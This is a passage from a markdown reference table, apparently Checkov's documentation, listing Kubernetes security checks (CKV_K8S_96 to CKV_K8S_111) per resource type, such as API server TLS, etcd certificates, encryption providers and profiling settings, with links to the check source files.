[ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | -| 3155 | CKV_K8S_96 | resource | ReplicaSet | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | -| 3156 | CKV_K8S_96 | resource | ReplicationController | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | -| 3157 | CKV_K8S_96 | resource | StatefulSet | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | -| 3158 | CKV_K8S_97 | resource | CronJob | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | -| 3159 | CKV_K8S_97 | resource | DaemonSet | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | -| 3160 | CKV_K8S_97 | resource | Deployment | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | -| 3161 | CKV_K8S_97 | resource | DeploymentConfig | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | -| 3162 | CKV_K8S_97 | resource | Job | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | -| 3163 | CKV_K8S_97 | resource | Pod | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | -| 3164 | CKV_K8S_97 | resource | PodTemplate | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | -| 3165 | CKV_K8S_97 | resource | ReplicaSet | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | -| 3166 | CKV_K8S_97 | resource | ReplicationController | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | -| 3167 | CKV_K8S_97 | resource | StatefulSet | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | -| 3168 | CKV_K8S_99 | resource | CronJob | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | -| 3169 | CKV_K8S_99 | resource | DaemonSet | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | -| 3170 | CKV_K8S_99 | resource | Deployment | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | -| 3171 | CKV_K8S_99 | resource | DeploymentConfig | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | -| 3172 | CKV_K8S_99 | resource | Job | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | -| 3173 | CKV_K8S_99 | resource | Pod | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | -| 3174 | CKV_K8S_99 | resource | PodTemplate | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | -| 3175 | CKV_K8S_99 | resource | ReplicaSet | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | -| 3176 | CKV_K8S_99 | resource | ReplicationController | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | -| 3177 | CKV_K8S_99 | resource | StatefulSet | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | -| 3178 | CKV_K8S_100 | resource | CronJob | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | -| 3179 | CKV_K8S_100 | resource | DaemonSet | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | -| 3180 | CKV_K8S_100 | resource | Deployment | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | -| 3181 | CKV_K8S_100 | resource | DeploymentConfig | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | -| 3182 | CKV_K8S_100 | resource | Job | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | -| 3183 | CKV_K8S_100 | resource | Pod | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | -| 3184 | CKV_K8S_100 | resource | PodTemplate | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | -| 3185 | CKV_K8S_100 | resource | ReplicaSet | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | -| 3186 | CKV_K8S_100 | resource | ReplicationController | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | -| 3187 | CKV_K8S_100 | resource | StatefulSet | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | -| 3188 | CKV_K8S_102 | resource | CronJob | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | -| 3189 | CKV_K8S_102 | resource | DaemonSet | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | -| 3190 | CKV_K8S_102 | resource | Deployment | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | -| 3191 | CKV_K8S_102 | resource | DeploymentConfig | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | -| 3192 | CKV_K8S_102 | resource | Job | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | -| 3193 | CKV_K8S_102 | resource | Pod | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | -| 3194 | CKV_K8S_102 | resource | PodTemplate | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | -| 3195 | CKV_K8S_102 | resource | ReplicaSet | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | -| 3196 | CKV_K8S_102 | resource | ReplicationController | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | -| 3197 | CKV_K8S_102 | resource | StatefulSet | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | -| 3198 | CKV_K8S_104 | resource | CronJob | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | -| 3199 | CKV_K8S_104 | resource | DaemonSet | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | -| 3200 | CKV_K8S_104 | resource | Deployment | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | -| 3201 | CKV_K8S_104 | resource | DeploymentConfig | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | -| 3202 | CKV_K8S_104 | resource | Job | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | -| 3203 | CKV_K8S_104 | resource | Pod | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | -| 3204 | CKV_K8S_104 | resource | PodTemplate | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | -| 3205 | CKV_K8S_104 | resource | ReplicaSet | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | -| 3206 | CKV_K8S_104 | resource | ReplicationController | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | -| 3207 | CKV_K8S_104 | resource | StatefulSet | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | -| 3208 | CKV_K8S_105 | resource | CronJob | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | -| 3209 | CKV_K8S_105 | resource | DaemonSet | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | -| 3210 | CKV_K8S_105 | resource | Deployment | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | -| 3211 | CKV_K8S_105 | resource | DeploymentConfig | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | -| 3212 | CKV_K8S_105 | resource | Job | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | -| 3213 | CKV_K8S_105 | resource | Pod | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | -| 3214 | CKV_K8S_105 | resource | PodTemplate | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | -| 3215 | CKV_K8S_105 | resource | ReplicaSet | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | -| 3216 | CKV_K8S_105 | resource | ReplicationController | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | -| 3217 | CKV_K8S_105 | resource | StatefulSet | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | -| 3218 | CKV_K8S_106 | resource | CronJob | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | -| 3219 | CKV_K8S_106 | resource | DaemonSet | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | -| 3220 | CKV_K8S_106 | resource | Deployment | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | -| 3221 | CKV_K8S_106 | resource | DeploymentConfig | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | -| 3222 | CKV_K8S_106 | resource | Job | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | -| 3223 | CKV_K8S_106 | resource | Pod | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | -| 3224 | CKV_K8S_106 | resource | PodTemplate | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | -| 3225 | CKV_K8S_106 | resource | ReplicaSet | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | -| 3226 | CKV_K8S_106 | resource | ReplicationController | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | -| 3227 | CKV_K8S_106 | resource | StatefulSet | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | -| 3228 | CKV_K8S_107 | resource | CronJob | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | -| 3229 | CKV_K8S_107 | resource | DaemonSet | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | -| 3230 | CKV_K8S_107 | resource | Deployment | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | -| 3231 | CKV_K8S_107 | resource | DeploymentConfig | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | -| 3232 | CKV_K8S_107 | resource | Job | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | -| 3233 | CKV_K8S_107 | resource | Pod | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | -| 3234 | CKV_K8S_107 | resource | PodTemplate | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | -| 3235 | CKV_K8S_107 | resource | ReplicaSet | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | -| 3236 | CKV_K8S_107 | resource | ReplicationController | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | -| 3237 | CKV_K8S_107 | resource | StatefulSet | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | -| 3238 | CKV_K8S_108 | resource | CronJob | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | -| 3239 | CKV_K8S_108 | resource | DaemonSet | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | -| 3240 | CKV_K8S_108 | resource | Deployment | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | -| 3241 | CKV_K8S_108 | resource | DeploymentConfig | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | -| 3242 | CKV_K8S_108 | resource | Job | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | -| 3243 | CKV_K8S_108 | resource | Pod | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | -| 3244 | CKV_K8S_108 | resource | PodTemplate | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | -| 3245 | CKV_K8S_108 | resource | ReplicaSet | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | -| 3246 | CKV_K8S_108 | resource | ReplicationController | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | -| 3247 | CKV_K8S_108 | resource | StatefulSet | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | -| 3248 | CKV_K8S_110 | resource | CronJob | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | -| 3249 | CKV_K8S_110 | resource | DaemonSet | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | -| 3250 | CKV_K8S_110 | resource | Deployment | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | -| 3251 | CKV_K8S_110 | resource | DeploymentConfig | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | -| 3252 | CKV_K8S_110 | resource | Job | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | -| 3253 | CKV_K8S_110 | resource | Pod | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | -| 3254 | CKV_K8S_110 | resource | PodTemplate | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | -| 3255 | CKV_K8S_110 | resource | ReplicaSet | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | -| 3256 | CKV_K8S_110 | resource | ReplicationController | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | -| 3257 | CKV_K8S_110 | resource | StatefulSet | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | -| 3258 | CKV_K8S_111 | resource | CronJob | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | 